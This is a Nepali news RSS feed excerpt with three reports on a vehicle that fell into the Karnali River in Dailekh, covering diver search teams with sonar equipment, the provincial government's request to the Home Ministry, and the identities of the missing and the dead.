कर्णालीमा खसेको गाडी खोज्न गोताखोर टोलीलाई सोनार क्यामरा र म्याग्नेटसहित परिचालन https://www.antaranganews.com/?p=49845 https://www.antaranganews.com/?p=49845#respond Sat, 04 Jul 2026 06:42:27 +0000 https://www.antaranganews.com/?p=49845 साङ्गेताडा(दैलेख)– कर्णालीमा बेपत्ता गाडी र यात्रुको खोजी गर्न सोनार क्यामरा र म्याग्नेटसहितको टोली पठाइएको छ । दैलेखको चामुण्डा बिन्द्रासैनी नगरपालिका– ७ साङ्गेताडास्थित कर्णाली नदीमा खसेको गाडी र यात्रुको खोजीका लागि आज तेस्रो दिन सशस्त्र प्रहरी बल नेपालले विशेष उपकरणसहित थप गोताखोर टोली असार २० गते परिचालन गरिदैछ ।
सो टोलीले घटनास्थल पुगेर खोजी आजै उद्धार कार्यमा सहभागी हुने सशस्त्र प्रहरीले जनाएको छ । सशस्त्र प्रहरी बल नेपालको विपद् व्यवस्थापन तालिम शिक्षालय, कुरिनटारबाट सशस्त्र प्रहरी टोलीसँग पानीमुनि तथा तीव्र बहावमा रहेका वस्तु र सवारीसाधनको खोजीमा प्रयोग हुने सशस्त्र प्रहरीका सह–प्रवक्ता डिएसपी शैलेन्द्र थापाले बताउनुृ भयो । उहाँका अनुसार टोलीलार्ई सोनार क्यामरा, म्याग्नेट लगायतका विशेष उपकरणसहित पठाइएको छ । ती उपकरणको सहायताले नदीको गहिराइमा बेपत्ता गाडी र यात्रुको खोजी गरिनेछ ।
सशस्त्र प्रहरी निरीक्षक प्रेमबहादुर तामाङको कमाण्डमा चार सदस्यीय गोताखोर टोली घटनास्थलतर्फ १९ गते नै पठाइएको हो ।
दुर्घटनाको खबर प्राप्त हुनासाथ सशस्त्र प्रहरी बल नेपाल गुल्म दैलेख, माथिल्लो कर्णाली जलविद्युत् आयोजना सुरक्षा बेस तथा सशस्त्र प्रहरी बल नेपाल नं. ६ महेश्वरी बाहिनी मुख्यालय, सुर्खेतबाट ६ जना गोताखोरसहितको उद्धार टोली परिचालन गरिएको थियो ।
सुर्खेतबाट कालिकोटतर्फ जाँदै गरेको कर्णाली प्रदेश ०२–००१ ख १०५५ नम्बरको फोर्स गाडी असार १८ गते सडकबाट अन्दाजी ६०० सय मिटर तल कर्णाली नदीमा खसेको थियो ।
दुर्घटनाकै दिन घटनास्थलबाट करिब ४ सय मिटर तल भिरमा अड्किएको अवस्थामा एक पुरुषको शव फेला पारिएको थियो । तर, गाडी र अन्य यात्रुको अवस्था अझै अज्ञात रहेकाले खोजी कार्य जारी रहेको सशस्त्र प्रहरीले जनाएको छ ।
चार जनाको पहिचान :
कर्णालीमा गाडीसँगै बेपत्ता भएकामध्ये चार जनाको पहिचाना खुलेको प्रहरीले जनाएको छ ।
कर्णालीमा खसेर हालसम्म गाडीसंगै फेला नपरेकाहरूमा सुर्खेतको पञ्चपुरी नगरपालिका– ८ माझीगाउँका चालक तुलसीराम सुवेदी, उनका सहोदर दाइ रामप्रसाद सुवेदी, कालीकोटको रास्कोट नगरपालिका– २ खड्का गाउँकी सृर्जना खड्का र कालीकोट पाचल झरना गाउँपालिका– ९ का मेखे तिरुवा रहेको बैतडीका प्रवक्ता प्रहरी निरीक्षक पुष्पराज रोकायाले बताउनु भयो । उहाँका अनुसार कालीकोट पाचल झरना गाउँपालिका– ९ का ४५ बर्षीय जेखे तिरुवाको शव भने भीरमा अड्किएको अवस्थामा फेला परेको थियो । उनको शव आफन्तले बुझिसकेका छन् ।
गाडीमा कति यात्रु थिए भन्ने अझै यकिन भएको छैन ।
सोही दिनदेखि नै नेपाल प्रहरी र सशस्त्र प्रहरीको गोताखोर परिचालन गरी खोजीकार्य भइरहेको तर नदीमा पानीको तिब्र बहाव र धमिलो पानीका कारणले उद्धार कार्यले सार्थक रुप लिन सकेको छैन ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49845 0
कर्णालीमा खसेर वेपत्ता फोर्स गाडी खोज्न प्रदेश सरकारद्वारा गृह मन्त्रालयसँग सहयोग माग https://www.antaranganews.com/?p=49810 https://www.antaranganews.com/?p=49810#respond Fri, 03 Jul 2026 12:53:09 +0000 https://www.antaranganews.com/?p=49810 सुर्खेत– कर्णाली प्रदेश सरकारले कर्णाली नदीमा हिजो खसेर वेपत्ता भएको फोर्स गाडीको खोजी कार्यका लागि गृह मन्त्रालयसँग थप सहयोग र समन्वयको आग्रह गरेको छ । कर्णाली प्रदेशको मुख्यमन्त्री तथा मन्त्रिपरिषद्को कार्यालयले गृह मन्त्रालयलाई पत्र लेख्दै असार १९ गते त्यस्तो माग गरेको हो ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको क.प्र.०२–००१ ख १०५५ नम्बरको फोर्स गाडी खोज्नका लागि प्रदेश सरकारले गृहमन्त्रालयसँग सहयोग माग गरेको हो । दैलेखको चामुण्डाबिन्द्रासैनी नगरपालिका– ७ स्थित कर्णाली राजमार्गको सांगेतडा सडक खण्डबाट सो गाडी कर्णाली नदीमा खसेको थियो । घट्नाको करिब ३० घण्टा वितिसक्दा पनि बसका बारेमा कुनै पत्तो हुन नसकेपछि प्रदेश सरकारले संघ सरकारको गृहमन्त्रालयसँग थप सहयोगको अपिल गरेको हो । उक्त दुर्घट्ना हिजो विहान करिब ११ः३० बजे भएको प्रहरी भनाइ छ ।
दुर्घटनापछि गोताखोर ६ जना सहित नेपाल प्रहरी, सशस्त्र प्रहरी बल तथा स्थानीय बासिन्दाको टोली तत्काल घटनास्थलमा परिचालन भई खोज तथा उद्धार कार्य सुरु गरिएको छ । प्रदेश सरकारले हालसम्म एकजना यात्रुको शव फेला परेको उल्लेख गर्दै दुर्घटनाग्रस्त सवारीसाधन र त्यसमा सवार अन्य यात्रुको अवस्था अझै अज्ञात रहेको पत्रमा उल्लेख गरेको छ ।
घटनास्थलमा खटिएको जनशक्ति पर्याप्त नभएपछि खोज तथा उद्धार कार्यलाई तीव्र बनाउन थप सहयोग तथा आवश्यक समन्वय गरिदिन प्रदेश सरकारले गृह मन्त्रालयसँग अनुरोध गरेको बताइएको छ ।
सो बसमा के कति यात्रु सवार थिए भन्ने पनि यकिन हुन सकेको छेन । सुर्खेतबाट भने दुई चालक दल(दाजु र भाइ) समेत तीन यात्रको चलान काटिएको खुल्न आएको प्रहरीले जनाएको छ । प्रहरीका अनुसार बीच बाटोमा के कति यात्रु चढेका थिए भन्ने खुल्न सकेको छैन ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49810 0
कर्णालीमा यात्रुबाहक बस दुर्घटना, १३ बेपत्ता एकको शव फेला, उद्धार कार्य जारी https://www.antaranganews.com/?p=49797 https://www.antaranganews.com/?p=49797#respond Thu, 02 Jul 2026 14:08:08 +0000 https://www.antaranganews.com/?p=49797 चामुण्डाबिन्द्रासैनी(दैलेख)– दैलेख जिल्लाको स्थानीय नगरपालिका– ७ को कर्णाली राजमार्गमा साङ्गेतडा सडकखण्डमा यात्रुबाहक बस दुर्घटनामा परेको छ । सो घट्नामा १३ जना बेपत्ता भएको एक जनाको शव फेला परेको र उद्धार कार्य जारी रहेको प्रहरीले आज असार १८ गते जनाएको छ ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको क.प्र. ०२–००१ ख १०५५ नम्बरको बस आज बिहान करिब साढे ११ बजे दुर्घट्नामा परेको जिल्ला प्रहरी कार्यालय दैलेखले जनाएको छ । बस सडकबाट करिब ६ सय मिटर तल कर्णाली नदीमा खसेको जिल्ला प्रहरी कार्यालय दैलेखका प्रमुख प्रहरी नायव उपरीक्षक श्रवणकुमार बिकले बताउनुभयो । उहाँका अनुसार बेपत्ता भएका यात्रुहरूको खोजी कार्य जारी रहेको छ । उहाँले भन्नुभयो, प्रारम्भिक सूचना अनुसार उक्त बसमा १३ नना यात्रु सवार थिए ।
प्रभावकारी उद्धारका लागि सशस्त्र प्रहरी बल, गोताखोरको टोली, नेपाल प्रहरी तथा माथिल्लो कर्णाली जलविद्युत् आयोजना सुरक्षा बेसबाट संयुक्त टोली खटिएको छ । उद्धार टोली ३५ जना प्रहरी परिचालन भएको प्रहरी भनाइ छ ।
दुर्घटनास्थल प्रहरी चौकी पाल्तडाबाट करिब ३ किलोमिटर तथा जिल्ला प्रहरी कार्यालय दैलेखबाट करिब ५० किलोमिटर पश्चिममा पर्छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49797 0